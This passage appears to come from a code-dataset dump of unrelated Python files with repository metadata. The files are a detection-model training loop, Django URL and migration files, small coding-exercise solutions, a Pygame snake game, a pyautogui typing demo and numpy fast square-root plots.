gen = DataLoader(train_dataset, shuffle=True, batch_size=Batch_size, num_workers=4, pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
gen_val = DataLoader(val_dataset, shuffle=True, batch_size=Batch_size, num_workers=4,pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
epoch_size = num_train//Batch_size
epoch_size_val = num_val//Batch_size
#------------------------------------#
# 冻结一定部分训练
#------------------------------------#
for param in model.backbone_net.parameters():
param.requires_grad = False
for epoch in range(Init_Epoch,Freeze_Epoch):
val_loss = fit_one_epoch(net,efficient_loss,epoch,epoch_size,epoch_size_val,gen,gen_val,Freeze_Epoch,Cuda)
lr_scheduler.step(val_loss)
if True:
#--------------------------------------------#
# BATCH_SIZE不要太小,不然训练效果很差
#--------------------------------------------#
lr = 1e-4
Batch_size = 4
Freeze_Epoch = 50
Unfreeze_Epoch = 100
optimizer = optim.Adam(net.parameters(),lr,weight_decay=5e-4)
lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.5, patience=2, verbose=True)
train_dataset = EfficientdetDataset(lines[:num_train], (input_shape[0], input_shape[1]), is_train=True)
val_dataset = EfficientdetDataset(lines[num_train:], (input_shape[0], input_shape[1]), is_train=False)
gen = DataLoader(train_dataset, shuffle=True, batch_size=Batch_size, num_workers=4, pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
gen_val = DataLoader(val_dataset, shuffle=True, batch_size=Batch_size, num_workers=4,pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
epoch_size = num_train//Batch_size
epoch_size_val = num_val//Batch_size
#------------------------------------#
# 解冻后训练
#------------------------------------#
for param in model.backbone_net.parameters():
param.requires_grad = True
for epoch in range(Freeze_Epoch,Unfreeze_Epoch):
val_loss = fit_one_epoch(net,efficient_loss,epoch,epoch_size,epoch_size_val,gen,gen_val,Unfreeze_Epoch,Cuda)
lr_scheduler.step(val_loss)
|
[
"[email protected]"
] | |
871f3e48a561c6d3a0a81e78fb26e52f6fa2eb7c
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2/gavicharla/codejam1.py
|
25da9175da664053709c8d25e93ab4bca77cade7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 515 |
py
|
def flip(s,l):
str1 = []
for i in range(l):
if(s[i] == '-'):
str1.append('+')
else:
str1.append('-')
return "".join(str1)
test_cases = int(raw_input())
for test in range(test_cases):
s = raw_input()
l = len(s)
count = l
let =0
while ('-' in s):
let+=1
last_m = s[:count].rfind("-")
s = flip(s[:last_m+1],last_m+1)+s[last_m+1:]
count = s.rfind("+")
print "case #"+str(test+1)+": "+str(let)
|
[
"[[email protected]]"
] | |
15c1f69c5aa5ca2b67a72818e30d8b469b8e8493
|
a5c3174d2b3a168274b61c0a6b5df498f888bf70
|
/cars/urls.py
|
04c2bfebb6bd822e57fe1e02adb73f3b5eb06328
|
[] |
no_license
|
nord778/Rcoi_course
|
83dd69d2e96b71a4285fbdeed624a34f92b00eb2
|
b0b513467bf33e40b2909f8b02fa1d2e64393d4b
|
refs/heads/master
| 2023-06-14T05:52:35.224671 | 2021-06-29T08:48:41 | 2021-06-29T08:48:41 | 380,979,906 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 219 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.cars, name='cars'),
path('<int:id>', views.car_detail, name='car_detail'),
path('search', views.search, name='search'),
]
|
[
"[email protected]"
] | |
9c74c5965bad6ba10f49b56d5ec78a2342cfe9e0
|
377fc6e13101a2a45826cd118110c790f396a805
|
/past202010-b.py
|
458abc0ee58e452eeec63c3c668e014a6a90092e
|
[] |
no_license
|
number09/atcoder
|
4076e7223f424b9923754e73992d6442e0bb0de7
|
f521ca1205b254d99744abaf6a7a5bfe69845fe0
|
refs/heads/master
| 2021-06-04T23:16:39.021645 | 2021-01-19T08:30:39 | 2021-01-19T08:30:39 | 132,128,927 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 189 |
py
|
x, y = map(int, input().split())
if y == 0:
print('ERROR')
else:
a = str(x / y)
a_a, a_b = a.split('.')
if len(a_b) == 1:
a_b += '0'
print(a_a + '.' + a_b[:2])
|
[
"[email protected]"
] | |
4a37455d9a0b65a8c4aec6586528fc1fcda1e472
|
085d3f2f8de5442d69962a65b8acd79478599022
|
/2.Dictionaries - the root of Python/Safely finding by key.py
|
e66f37889bfe6d285916f26ea00f6830005db3ba
|
[] |
no_license
|
Mat4wrk/Data-Types-for-Data-Science-in-Python-Datacamp
|
bfe8f8c4d4bc3998ef612f0d3137b15e662209d0
|
c2eb30d3c500f69486921d26071a2ef2244e0402
|
refs/heads/main
| 2023-03-13T10:06:10.748044 | 2021-03-07T14:43:25 | 2021-03-07T14:43:25 | 331,574,648 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 260 |
py
|
# Safely print rank 7 from the names dictionary
print(names.get(7))
# Safely print the type of rank 100 from the names dictionary
print(type(names.get(100)))
# Safely print rank 105 from the names dictionary or 'Not Found'
print(names.get(105, 'Not Found'))
|
[
"[email protected]"
] | |
b56333e0e90f01dcc81cbfd40678a72aa6983028
|
0df72d9c1f3c30f30a329ef0b87edaa8d0a1c5d7
|
/Day-4/Task6.py
|
9c822d47037eabf7233b03bfc134f44f9d2271d6
|
[] |
no_license
|
pranshu-joshi/Pranshu_InternshipTasks
|
828f7af51e672accec95d36b6faec58286765da1
|
d249e160568d227e220c13e3409c707cff54132c
|
refs/heads/main
| 2023-05-22T19:10:02.448125 | 2021-06-14T10:56:15 | 2021-06-14T10:56:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 156 |
py
|
#Variable-length arguements.
def myfunction(**args):
for i,j in args.items():
print(i,j)
myfunction(firstname=': Pranshu',lastname=': Joshi')
|
[
"[email protected]"
] | |
bb41fbb260b41833d1b96a8fd626cf8493a3bcbd
|
8f3df95b1f729ab690cb99fcda80d5dc298ee75d
|
/mystorage/migrations/0001_initial.py
|
0156f8c0d91c3ce03143277f914af629fefbd191
|
[] |
no_license
|
solone313/DRF_practice
|
8c72ef46cc93f607cce6b3f98a80d1bf7ca56c14
|
a1473f341f81ac067cbd8c8160b6bd48d4bdf6ad
|
refs/heads/master
| 2020-12-04T19:09:47.410682 | 2020-01-07T13:13:24 | 2020-01-07T13:13:24 | 231,877,266 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 796 |
py
|
# Generated by Django 2.2.8 on 2020-01-05 06:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Essay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30)),
('body', models.TextField()),
('author', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"[email protected]"
] | |
a89da0c65a3a5001c7d30b8a9f9869e3deb76f6e
|
e69ec735c091215141acab0a6f2e07e2606cd1b2
|
/src/kirr/hostsconf/views.py
|
a933e13a04210c16a7454b73d5a00c587391a512
|
[
"MIT"
] |
permissive
|
imtiaz-rahi/django-short-url
|
209f4e7cd0ee490842a331f305f71577be2cf6f6
|
9fc3dc873d3307eb20bdc77a91037f269f8e8a00
|
refs/heads/master
| 2022-11-04T16:18:35.812899 | 2020-06-16T12:07:18 | 2020-06-16T12:14:18 | 266,201,831 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 340 |
py
|
from django.conf import settings
from django.http import HttpResponseRedirect
DEFAULT_REDIRECT_URL = getattr(settings, 'DEFAULT_REDIRECT_URL', 'http://www.kirr.co')
def wildcard_redirect(request, path=None, *args, **kwargs):
return HttpResponseRedirect(f'{DEFAULT_REDIRECT_URL}/{path}' if path is not None else DEFAULT_REDIRECT_URL)
|
[
"[email protected]"
] | |
dbb7d69232e842355628dd33e1a621132ca26521
|
0a8bb114534eabdcf8d9a1d43462e374183cf6e7
|
/users/urls.py
|
0ad2d087b883a2f82bcc164833f2af8d9b5f9882
|
[] |
no_license
|
jodhiambo/beelinev1
|
70a465ddf6e1f89493af07122496fd503d4d5d86
|
d8af31cf1090c58fe52d6bec0f82ac49e69260df
|
refs/heads/main
| 2023-06-23T09:05:47.386524 | 2021-07-21T12:51:00 | 2021-07-21T12:51:00 | 388,112,973 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 498 |
py
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
# from userprofiles.views import get_users_list, get_user_details
app_name = 'users'
urlpatterns = [
path('accounts/signup/', views.MySignUpView.as_view(), name='account_signup'),
path('accounts/login/', views.MyLoginView.as_view(), name='account_login'),
# path('users/list/', get_users_list, name='userlist'),
# path('users/<int:id>/', get_user_details, name='the-user'),
]
|
[
"[email protected]"
] | |
f039f11f1012417d425afe36144602e290845663
|
dc182e5b4597bdd104d6695c03744a12ebfe2533
|
/PythonScripts/cache_decorator.py
|
13a86e3faccaa6620f606d3880ecb8559d34a2e1
|
[] |
no_license
|
srinaveendesu/Programs
|
06fb4a4b452445e4260f9691fe632c732078d54d
|
f6dbd8db444678b7ae7658126b59b381b3ab0bab
|
refs/heads/master
| 2023-01-27T14:42:40.989127 | 2023-01-18T22:36:14 | 2023-01-18T22:36:14 | 129,948,488 | 1 | 0 | null | 2022-09-13T23:06:04 | 2018-04-17T18:30:13 |
Python
|
UTF-8
|
Python
| false | false | 404 |
py
|
def cache(func):
"""Keep a cache of previous function calls"""
@functools.wraps(func)
def wrapper_cache(*args, **kwargs):
cache_key = args + tuple(kwargs.items())
if cache_key not in wrapper_cache.cache:
wrapper_cache.cache[cache_key] = func(*args, **kwargs)
return wrapper_cache.cache[cache_key]
wrapper_cache.cache = dict()
return wrapper_cache
|
[
"[email protected]"
] | |
368da12078ad24bb8c1403761b573a5acd4f731c
|
2a54e8d6ed124c64abb9e075cc5524bb859ba0fa
|
/.history/1-Python-Basics/4-bind()-complex_20200412164915.py
|
3951d6e1beff4faa4c6fcf2e2f7923a3bcedeff0
|
[] |
no_license
|
CaptainStorm21/Python-Foundation
|
01b5fbaf7a913506518cf22e0339dd948e65cea1
|
a385adeda74f43dd7fb2d99d326b0be23db25024
|
refs/heads/master
| 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
#complex
z = complex(2, -3)
print(z)
z = complex(1)
print(z)
z = complex()
print(z)
z = complex('5-9j')
print(z)
# output
# (2-3j)
# (1+0j)
# 0j
# (5-9j)
#binary
print(bin(5))
# binary output 0b101
#binary with letter b with python
#non-python binary number of 5 is 101
#convert from binary into an integer
print()
|
[
"[email protected]"
] | |
81e61ec856c688e116a50309c0fdcc84a1272194
|
26e50ea44cdaee9dbf07dd641ceef1fdae661bb4
|
/snake/snake.py
|
ab08e4d00c289abcb7f7cffadb08bf23155341bd
|
[] |
no_license
|
javibodas/SnakePython
|
d1497c24a68cabd19f7e92ba5845c28a24d02302
|
6e4b228bf5a2a26553dcece3d79534518851a7f9
|
refs/heads/master
| 2021-01-10T10:36:19.932264 | 2020-01-02T18:45:40 | 2020-01-02T18:45:40 | 43,549,213 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,503 |
py
|
# coding: utf-8
import sys
import score as scoremodule
from block import Block
from blocks import Blocks
from pygame import display, image, event, init, font
from pygame.locals import *
__alls__ = ["SCREEN_WIDTH", "SCREEN_HEIGHT", "BLOCK_SIZE", "START_POSITION", "main"]
# IT CAN BE POSSIBLE TO CHANGE THIS PARAMETERS TO CHANGE THE SIZE ELEMENTS AND THE START POSITION SNAKE.
SCREEN_WIDTH = 588
SCREEN_HEIGHT = 588
BLOCK_SIZE = 28
START_POSITION = 280, 280
# IT CANT BE POSSIBLE TO CHANGE THIS PARAMETERS BECAUSE OF THE CORRECT FUNCTION OF THE CODE.
_SCREEN_MAX_LIMIT = SCREEN_WIDTH - BLOCK_SIZE
_SCREEN_MIN_LIMIT = BLOCK_SIZE
""""
Array system snake direction [x,y]:
[1,0]: Right, positive x
[-1,0]: Left, negative x
[0,-1]: Up, negative y
[0,1]: Down, positive y
"""
_direction = [0, -1]
_olderDirection = [_direction[0], _direction[1]]
# Difficulty
_velocity = .05
# Images size is BLOCK_SIZExBLOCK_SIZE
# It is necessary to change the images when is changed the size of the elements in screen.
BODY = image.load('./images/snake/body.png')
HEAD = image.load('./images/snake/head.png')
FRUIT = image.load('./images/snake/fruit.png')
TREE = image.load('./images/snake/tree.png')
def update_body_snake_positions():
global blocks
global screen
screen.blit(HEAD, (blocks.get_first_block().getX(),
blocks.get_first_block().getY()))
for block in blocks.get_blocks()[1:]:
block.set_last_X(block.getX())
block.set_last_Y(block.getY())
block.setX(block.get_before_block().get_last_X())
block.setY(block.get_before_block().get_last_Y())
screen.blit(BODY, (block.getX(), block.getY()))
def paint_trees():
global screen
for i in range(0,int(SCREEN_WIDTH/BLOCK_SIZE)):
screen.blit(TREE, (i*BLOCK_SIZE,0))
for i in range(0,int(SCREEN_HEIGHT/BLOCK_SIZE)):
screen.blit(TREE, (SCREEN_WIDTH-BLOCK_SIZE,i*BLOCK_SIZE))
for i in range(0,int(SCREEN_WIDTH/BLOCK_SIZE)):
screen.blit(TREE, (i*BLOCK_SIZE,SCREEN_HEIGHT-BLOCK_SIZE))
for i in range(0,int(SCREEN_HEIGHT/BLOCK_SIZE)):
screen.blit(TREE, (0,i*BLOCK_SIZE))
def generate_fruit():
from random import randint
global blocks
posFruit = (randint(1,19)*BLOCK_SIZE,randint(1,19)*BLOCK_SIZE)
while 1:
posAvailable = True
for block in blocks.get_blocks():
if block.getX() == posFruit[0] and block.getY() == posFruit[1]:
posAvailable = False
break
if not posAvailable:
posFruit = (randint(1,19)*BLOCK_SIZE,randint(1,19)*BLOCK_SIZE)
else:
break
return posFruit
def check_collision(xMovement, yMovement):
collision = False
for block in blocks.get_blocks()[1:]:
if block.getX() == xMovement and block.getY() == yMovement:
collision = True
break
if xMovement >= _SCREEN_MAX_LIMIT or xMovement < _SCREEN_MIN_LIMIT or yMovement >= _SCREEN_MAX_LIMIT or yMovement < _SCREEN_MIN_LIMIT:
collision = True
return collision
def reset_game():
global score
global _direction
global _olderDirection
_direction = [0, -1]
_olderDirection = [_direction[0], _direction[1]]
if score.points > score.max_points:
score.max_points = score.points
score.points = 0
event.clear()
initialize_game()
game()
def initialize_game():
global blocks
global screen
global score
global posFruit
global labelPoints
global myfont
init() # Pygame init
screen = display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
myfont = font.SysFont('monospace', 20)
blocks = Blocks(Block(*START_POSITION))
posFruit = (-1, -1)
# INITIALIZE SCREEN POSITIONS
screen.blit(HEAD, (BLOCK_SIZE, BLOCK_SIZE))
screen.blit(BODY, (START_POSITION[0] - BLOCK_SIZE, START_POSITION[1]))
labelPoints = myfont.render("Score: " + str(score.points) + " "
+ " Max. Score:" + str(score.max_points), 1, (255, 255, 0))
screen.blit(labelPoints, (14, 7))
paint_trees()
blocks.add_block(Block(BLOCK_SIZE, START_POSITION[1] - BLOCK_SIZE))
blocks.get_last_block().set_before_block(blocks.get_first_block())
display.flip()
def game():
from time import sleep
from easygui import ynbox
global score
global _direction
global _olderDirection
global _velocity
global blocks
global screen
global posFruit
global labelPoints
global myfont
while 1:
sleep(_velocity)
screen.fill((0, 0, 0))
paint_trees()
screen.blit(labelPoints, (14, 7))
if posFruit[0] == -1 and posFruit[1] == -1: # Default fruit position
posFruit = generate_fruit()
elif posFruit[0] == blocks.get_first_block().getX() and posFruit[1] == blocks.get_first_block().getY():
b = Block(blocks.get_last_block().getX() - BLOCK_SIZE * _direction[0], blocks.get_last_block().getY() - BLOCK_SIZE * _direction[1])
b.set_before_block(blocks.get_last_block())
blocks.add_block(b)
#blocks.get_last_block().set_before_block(blocks.get_blocks()[len(blocks.get_blocks()) - 2])
posFruit = generate_fruit()
score.points = score.points + 100
labelPoints = myfont.render("Score: " + str(score.points) + " "
+ " Max. Score:" + str(score.max_points), 1, (255, 255, 0))
screen.blit(FRUIT, posFruit)
next_x = blocks.get_first_block().getX()
next_y = blocks.get_first_block().getY()
eventP = event.poll()
if eventP.type == NOEVENT:
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
elif eventP.type == KEYDOWN and eventP.key == 275: # Right direction
_direction[0] = 1
_direction[1] = 0
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
elif eventP.type == KEYDOWN and eventP.key == 276: # Left direction
_direction[0] = -1
_direction[1] = 0
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
elif eventP.type == KEYDOWN and eventP.key == 274: # Down direction
_direction[0] = 0
_direction[1] = 1
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
elif eventP.type == KEYDOWN and eventP.key == 273: # Up direction
_direction[0] = 0
_direction[1] = -1
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
else: # No controlled event
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
if (_olderDirection[0] + _direction[0]) == 0 and (_olderDirection[1] + _direction[1]) == 0: # Event direction equals to current direction. No changes.
_direction = [_olderDirection[0],_olderDirection[1]]
next_x = next_x + (BLOCK_SIZE * _direction[0])
next_y = next_y + (BLOCK_SIZE * _direction[1])
if check_collision(next_x, next_y):
if ynbox('Total Score: ' + str(score.points) + ' . Do you want to play again?', 'End Game', ('Yes', 'No')):
break
else:
score.write_score_file()
return(0)
blocks.get_first_block().set_last_X(blocks.get_first_block().getX())
blocks.get_first_block().set_last_Y(blocks.get_first_block().getY())
blocks.get_first_block().setX(next_x)
blocks.get_first_block().setY(next_y)
_olderDirection = [_direction[0], _direction[1]]
update_body_snake_positions()
display.flip()
reset_game()
def main(difficulty):
global score
global _velocity
score = scoremodule.Score('SNAKE')
score.read_score_file()
if difficulty == 'Easy':
_velocity = .2
elif difficulty == 'Medium':
_velocity = .1
elif difficulty == 'Difficult':
_velocity = .05
elif difficulty == 'Pro':
_velocity = .035
initialize_game()
return(game())
|
[
"[email protected]"
] | |
0c510cd43363ec78afcc84b81f6eb6776f6efc44
|
7ddc7de7889cbda2b0ce3e65a5316899a7c0094d
|
/keyboard_automation.py
|
23c324a86d5ec211b2eb242200b52db8f71e5e94
|
[] |
no_license
|
EoinGr3y/python
|
65c7be6704f6a69a06001e30208cc4c203450099
|
b63bf205c460adc664a4f8d64a2c2fdeca3234dd
|
refs/heads/master
| 2021-04-06T06:10:06.441713 | 2018-03-12T19:28:42 | 2018-03-12T19:28:42 | 124,940,634 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 127 |
py
|
import pyautogui
pyautogui.click(100, 100)
pyautogui.typewrite('Hello world!', interval=0.1)
pyautogui.hotkey('ctrl', 'n')
|
[
"[email protected]"
] | |
88ad2030fd1b92b61c508064827a5d5b5688d2d8
|
8370c98faafe9ebe7163946a438245886473cb8a
|
/Algorithms/float/float_plots.py
|
4236b80bd1bd84530d7eb6a9ea6d57f9d24d4636
|
[
"CC-BY-3.0"
] |
permissive
|
maksimovica/numerical_computing
|
54bf28f9eeaf260f11c812dd680870d453494961
|
634a8430a9e203e3ab70ffedfb1d75a185b294ca
|
refs/heads/master
| 2021-01-21T06:55:11.961085 | 2014-08-20T17:16:35 | 2014-08-20T17:16:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,798 |
py
|
import numpy as np
from numpy.random import rand
import matplotlib
matplotlib.rcParams = matplotlib.rc_params_from_file('../../matplotlibrc')
from matplotlib import pyplot as plt
def sqrt32(A, reps):
Ac = A.copy()
I = Ac.view(dtype=np.int32)
I >>= 1
I += (1<<29) - (1<<22) - 0x4C000
for i in xrange(reps):
Ac = .5 *(Ac + A / Ac)
return Ac
def sqrt64(A, reps):
Ac = A.copy()
I = Ac.view(dtype=np.int64)
I >>= 1
I += (1<<61) - (1<<51)
for i in xrange(reps):
Ac = .5 *(Ac + A / Ac)
return Ac
# These do the same thing as the cython functions for the inverse square root.
def invsqrt32(A, reps):
Ac = A.copy()
if 0 < reps:
Ac2 = A.copy()
Ac2 /= - 2
Ac3 = np.empty_like(Ac)
I = Ac.view(dtype=np.int32)
I >>= 1
I *= -1
I += 0x5f3759df #hexadecimal representation of the constant
for j in xrange(reps):
Ac3[:] = Ac
Ac3 *= Ac
Ac3 *= Ac2
Ac3 += 1.5
Ac *= Ac3
return Ac
def invsqrt64(A, reps):
Ac = A.copy()
if 0 < reps:
Ac2 = A.copy()
Ac2 /= - 2
Ac3 = np.empty_like(Ac)
I = Ac.view(dtype=np.int64)
I >>= 1
I *= -1
I += 0x5fe6ec85e7de30da #hexadecimal representation of the constant
for j in xrange(reps):
Ac3[:] = Ac
Ac3 *= Ac
Ac3 *= Ac2
Ac3 += 1.5
Ac *= Ac3
return Ac
X = np.linspace(0, 3, 501)
plt.plot(X, sqrt64(X, 0), X, np.sqrt(X))
plt.savefig("sqrt0.pdf")
plt.cla()
plt.plot(X, sqrt64(X, 1), X, np.sqrt(X))
plt.savefig("sqrt1.pdf")
plt.cla()
X = np.linspace(.1, 3, 291)
plt.plot(X, invsqrt64(X, 0), X, 1./np.sqrt(X))
plt.savefig("invsqrt0.pdf")
plt.cla()
plt.plot(X, invsqrt64(X, 1), X, 1./np.sqrt(X))
plt.savefig("invsqrt1.pdf")
plt.cla()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.